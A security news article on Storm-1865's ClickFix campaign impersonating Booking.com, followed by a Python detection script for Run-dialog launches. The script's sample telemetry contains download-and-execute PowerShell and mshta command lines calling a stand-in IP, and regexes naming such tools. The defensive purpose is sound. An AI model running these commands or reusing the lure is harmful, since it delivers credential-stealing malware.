Threat Actor Impersonates Booking.com in Phishing Scheme

[Alexander Culafi, Senior News Writer, Dark Reading](/author/alexander-culafi)
March 14, 2025
4 Min Read

Though the concept of phishing is well established, as are its many variants, an emerging technique known as "ClickFix" relies on a different kind of social engineering to gain access to a victim: it talks the target into running the attacker's command themselves.

That is according to Microsoft, which [published threat intelligence on March 13](https://www.microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware/) on a threat actor tracked as Storm-1865. Microsoft describes ClickFix as a technique in which "a threat actor attempts to take advantage of human problem-solving tendencies by displaying fake error messages or prompts that instruct target users to fix issues by copying, pasting, and launching commands that eventually result in the download of malware." Storm-1865 was observed using it in attacks primarily targeting the hospitality industry.

The campaign casts a wide geographical net: Microsoft said Storm-1865 targeted organizations in "North America, Oceania, South and Southeast Asia, and Northern, Southern, Eastern, and Western Europe," choosing targets likely to work with the travel site Booking.com, because the threat actor impersonated Booking.com throughout the campaign. Microsoft first identified the activity in December 2024 and said that, as of February 2025, it remained ongoing.

How ClickFix Works
------------------

Storm-1865 begins its attack by sending the target a malicious email carrying some kind of call to action, all purporting to come from Booking.com: a guest wanting to learn more about a supposed negative review, an account verification, a request, or an offer of a promotional opportunity.

The email contains a link, either in the message body or in an attached PDF, that leads to a website displaying a fake CAPTCHA over a background designed to look like a Booking.com page. The "verification" instructs the user to press a keyboard shortcut that opens the Windows Run dialog and then paste a command that the page has already placed on the clipboard.
Upon doing so, a malicious payload is downloaded. Microsoft said multiple malware families were observed in the campaign, but noted "capabilities to steal financial data and credentials" in all of them.

This pairing of a verification page with a call to action is how Storm-1865 uses ClickFix. "This webpage gives the illusion that Booking.com uses additional verification checks, which might give the targeted user a false sense of security and therefore increase their chances of getting compromised," Microsoft said.

Microsoft urged users to follow good security hygiene to spot phishing emails: check that the sender's address is legitimate, contact the real provider (in this case Booking.com) directly, look for typos, inspect the URL behind any hyperlink, and be wary of calls to action or threats.

In an email, a spokesperson for Booking.com writes that while the company can confirm its own systems have not been breached, "We are aware that unfortunately some of our accommodation partners and customers have been impacted by phishing attacks sent by professional criminals, with the criminal intent of taking over their local computer systems with malware.

"The actual numbers of accommodations affected by this scam are a small fraction of those on our platform and we continue to make significant investments to limit the impact on our customers and partners. We are also committed to proactively helping our accommodation partners and customers to stay protected," Booking.com says. "It is important to note that we would never ask a customer to share payment information via email, chat messages, text messages or phone."

Why ClickFix Matters
--------------------

Although calls to action and a sleek webpage are two of the oldest tricks in the phishing playbook, using a verification step as the social engineering hook is a sophisticated twist on these ideas.

Chet Wisniewski, director and global field chief technology officer (CTO) at Sophos, says the technique is "certainly thinking outside of the box," but because he does not see Storm-1865 being copied by other threat groups, he does not think it has been a runaway success. One reason, he suggests, may be the level of sophistication required from the user.

"These attacks require a moderate level of sophistication on behalf of the user," Wisniewski says. "If you are too tech non-savvy you may be confused by these messages and not be able to complete the task, whereas if you are very sophisticated you are likely to smell a rat."

Wisniewski explains that cybercriminals have been instructing users on how to bypass security controls for many years, and this is just the latest attempt, albeit a slightly more sophisticated one.

"Hopefully we can raise awareness about these campaigns to warn off users," he says, "but additionally admins should be trying to limit administration rights to prevent damage from these types of lures."
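The execution shape described above (a command pasted into the Win+R Run dialog, which explorer.exe then spawns as a child process) is also what makes ClickFix visible on the endpoint. What follows is an added example, not code from Microsoft's report, from Dark Reading, or from Sophos: a small Python hunt over constructed Sysmon-style process-creation events and a constructed copy of the RunMRU registry history, flagging interpreter launches from the Run dialog whose command line carries ClickFix traits. Field names (Image, ParentImage, CommandLine) follow Sysmon Event ID 1; the sample values, the 203.0.113.10 address (TEST-NET-3, not a real indicator), the indicator regexes and the scoring weights are all assumptions made for the demo.

```python
"""Hunt for ClickFix-style Run-dialog launches in endpoint telemetry.

Added example for this article, not code from Microsoft or Dark Reading.
Events are constructed in the shape of Sysmon Event ID 1 (Image,
ParentImage, CommandLine); every value below is made up for the demo.
"""
import re
from dataclasses import dataclass

# Interpreters and LOLBins that ClickFix lures typically ask the user to
# paste into the Run box (assumed list; extend for your estate).
LOLBINS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
    "cscript.exe", "curl.exe", "msiexec.exe", "rundll32.exe",
}

# Command-line traits. Each is weak alone; the Run-dialog parent chain plus
# a remote URL, or plus two of the other traits, is what gets flagged.
INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "encoded_cmd": re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.I),
    "quiet_flags": re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b", re.I),
    # ClickFix commands often end in a comment so the Run box shows a
    # reassuring "verification" string instead of the payload.
    "decoy_comment": re.compile(r"#\s*.*\b(not a robot|verif\w*|captcha|fix)\b", re.I),
    "download_exec": re.compile(
        r"\b(iwr|invoke-webrequest|iex|invoke-expression|downloadstring|curl)\b", re.I),
}
WEIGHTS = {"remote_url": 2}  # everything else scores 1 (assumed weights)


@dataclass
class ProcEvent:
    image: str          # path of the new process
    parent_image: str   # path of its parent
    command_line: str


@dataclass
class Finding:
    event: ProcEvent
    hits: list
    score: int


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_command(cmd: str):
    """Return (score, [indicator names]) for one command line."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    return sum(WEIGHTS.get(h, 1) for h in hits), hits


def is_run_dialog_chain(ev: ProcEvent) -> bool:
    # Anything typed into Win+R is spawned by explorer.exe. explorer.exe also
    # launches shortcuts and double-clicked files, so the chain alone is not
    # enough; the combination with the command-line traits is what matters.
    return basename(ev.parent_image) == "explorer.exe" and basename(ev.image) in LOLBINS


def hunt_events(events, threshold: int = 2):
    findings = []
    for ev in events:
        if not is_run_dialog_chain(ev):
            continue
        score, hits = score_command(ev.command_line)
        if score >= threshold:
            findings.append(Finding(ev, hits, score))
    return findings


def parse_runmru(values: dict) -> list:
    """Return the Run-dialog history, most recent first.

    `values` mirrors HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU:
    single-letter value names hold 'command\\1' (a literal backslash-one
    suffix) and MRUList lists those letters most-recent-first.
    """
    history = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is not None:
            history.append(raw[:-2] if raw.endswith("\\1") else raw)
    return history


def hunt_runmru(values: dict, threshold: int = 2):
    """RunMRU entries were typed into Run by definition, so score them directly."""
    flagged = []
    for cmd in parse_runmru(values):
        score, hits = score_command(cmd)
        if score >= threshold:
            flagged.append((cmd, hits, score))
    return flagged


# Constructed sample telemetry; 203.0.113.0/24 is TEST-NET-3, not a real IOC.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              "powershell -w hidden -nop -c \"iex (iwr 'http://203.0.113.10/check.txt').Content\""
              " # I am not a robot - reCAPTCHA Verification ID: 4821"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              r"powershell.exe -File C:\Scripts\backup.ps1"),  # admin shortcut: benign
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\svchost.exe",
              "powershell -nop -c \"iwr http://intranet.example/health\""),  # scheduled task, not Run
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              "mshta https://203.0.113.10/verify.hta"),
]
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "calc\\1",
    "c": "powershell -w hidden -c \"iex(iwr http://203.0.113.10/v)\" # verification\\1",
}

if __name__ == "__main__":
    for f in hunt_events(SAMPLE_EVENTS):
        print(f"[{f.score}] {basename(f.event.image)} <- {basename(f.event.parent_image)}: "
              f"{', '.join(f.hits)}")
    for cmd, hits, score in hunt_runmru(SAMPLE_RUNMRU):
        print(f"[{score}] RunMRU: {cmd[:60]} ({', '.join(hits)})")
```

Run against the constructed data, the first and fourth events are flagged (the PowerShell one scores 5, the mshta one 2 on the URL alone), the scheduled-task event is ignored because its parent is not explorer.exe, and the RunMRU sweep surfaces only the pasted PowerShell line. RunMRU is worth checking in incident response because it records only what was actually executed from the Run dialog, so a match there is a strong signal even if process telemetry is missing. One caveat on Wisniewski's advice: removing administration rights limits what the follow-on malware can do to the machine, but the infostealers this campaign delivers run perfectly well in the user's own context, so the credential theft still succeeds; pairing the detection above with application control that denies interpreters such as mshta.exe to standard users closes more of the gap.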